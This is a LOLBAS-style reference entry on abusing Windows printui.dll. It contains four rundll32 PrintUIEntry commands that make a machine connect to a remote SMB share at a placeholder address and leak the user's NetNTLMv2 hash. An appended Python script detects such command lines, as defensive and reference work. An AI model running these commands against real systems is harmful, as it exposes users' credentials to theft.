LOLBin: printui.dll

Printer Settings User Interface (printui.dll) is an executable file containing the functions used by the printer configuration dialog boxes. Its functionality includes listing printer properties, adding new printers, installing a printer via an INF file, storing printer settings to a file, and loading printer settings from a file.

The Printer Settings User Interface (printui.dll) is a Living Off The Land Binary (LOLBin) that can be used by attackers to steal credentials. Attackers can attempt to list network printer properties, install a printer with an INF file located on an attacker-controlled share, or back up and restore settings from a file stored on an attacker-controlled share. In each case, Windows will automatically attempt to authenticate to the remote share using the current user's account credentials.

---
Name: printui.dll
Description: Printer Settings User Interface
Author: Benjamin Lim
Created: 6 Sep 2021
Commands:
  - Command: rundll32.exe printui.dll,PrintUIEntry /s /t1 /c\\1.2.3.4\printer
    Description: Run printer properties for a network printer.
    Usecase: An SMB connection will be created to the remote location, causing NetNTLMv2 challenge hash to be sent in the process.
    Category: Credentials
    Privileges: User
    MitreID: T1187
    MitreLink: https://attack.mitre.org/techniques/T1187/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
  - Command: rundll32.exe printui.dll, PrintUIEntry /ia /m "Brother DCP-128C" /K /h x64 /v 3 /f "\\1.2.3.4\printer1"
    Description: Run inf install for printer1 with inf file located on a remote share.
    Usecase: An SMB connection will be created to the remote location, causing NetNTLMv2 challenge hash to be sent in the process.
    Category: Credentials
    Privileges: User
    MitreID: T1187
    MitreLink: https://attack.mitre.org/techniques/T1187/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
  - Command: rundll32.exe printui.dll,PrintUIEntry /ia /c\\1.2.3.4\printer2 /m "Brother DCP-128C" /h "x86" /v "Type 3 - User Mode" /f c:\infpath\infFile.inf
    Description: Add printer driver for printer2 using inf file located on a remote share.
    Usecase: An SMB connection will be created to the remote location, causing NetNTLMv2 challenge hash to be sent in the process.
    Category: Credentials
    Privileges: User
    MitreID: T1187
    MitreLink: https://attack.mitre.org/techniques/T1187/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
  - Command: rundll32.exe printui.dll,PrintUIEntry /Ss /n "Fax" /a "\\1.2.3.4\printer3"
    Description: Store printer settings for printer named "Fax" onto a remote share.
    Usecase: An SMB connection will be created to the remote location, causing NetNTLMv2 challenge hash to be sent in the process. Prerequisites: System must have a printer named "Fax".
    Category: Credentials
    Privileges: User
    MitreID: T1187
    MitreLink: https://attack.mitre.org/techniques/T1187/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
Full_Path:
  - Path: c:\windows\system32\printui.dll
Detection:
  - IOC: SMB traffic from PID 4 to Internet destination
Resources:
  - Link: https://limbenjamin.com/articles/lolbin-printui.html
Acknowledgement:
  - Person: Benjamin Lim
    Handle: @limbenjamincom
---
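
A host-side check to complement the network IOC in the Detection field, added here as an example and not part of the original entry: it scans process-creation command lines (for instance from Sysmon Event ID 1 or Security Event ID 4688) for `printui.dll,PrintUIEntry` invocations that reference a UNC path and grades the remote host. The function names, verdict labels and the sample lines beyond the entry's own commands are assumptions made for illustration.

```python
import ipaddress
import re

# rundll32 loading the PrintUIEntry export of printui.dll; tolerates an
# optional space after the comma, as in the entry's second command.
PRINTUI_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+.*?printui(?:\.dll)?"?\s*,\s*PrintUIEntry', re.I)
# Host part of a UNC path: two backslashes, then a name or address.
UNC_RE = re.compile(r'\\\\([^\\\s"/]+)')

def unc_hosts(cmdline):
    """UNC hosts referenced by a printui.dll,PrintUIEntry command line."""
    if not PRINTUI_RE.search(cmdline):
        return []
    return UNC_RE.findall(cmdline)

def is_external(host):
    """True/False for a literal IP; None for a name that needs resolving."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return None

def triage(cmdline):
    """'alert' = public IP, 'review' = host name, 'internal', or 'ignore'."""
    verdicts = [is_external(h) for h in unc_hosts(cmdline)]
    if not verdicts:
        return "ignore"
    if True in verdicts:
        return "alert"
    return "review" if None in verdicts else "internal"

# Constructed process-creation command lines: the first three are the entry's
# own commands, the rest are made up for contrast.
SAMPLES = [
    r'rundll32.exe printui.dll,PrintUIEntry /s /t1 /c\\1.2.3.4\printer',
    r'rundll32.exe printui.dll, PrintUIEntry /ia /m "Brother DCP-128C" /K /h x64 /v 3 /f "\\1.2.3.4\printer1"',
    r'rundll32.exe printui.dll,PrintUIEntry /Ss /n "Fax" /a "\\1.2.3.4\printer3"',
    r'rundll32.exe printui.dll,PrintUIEntry /in /n "\\printsrv01\HP-Floor2"',
    r'rundll32.exe printui.dll,PrintUIEntry /s /t1 /c\\10.0.0.5\printer',
    r'rundll32.exe printui.dll,PrintUIEntry /p /n "Fax"',
    r'explorer.exe \\fileserver\share',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{triage(line):8} {line}")
```

Lines graded `review` name a host rather than an address; compare those against the organisation's list of known print servers before closing them.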
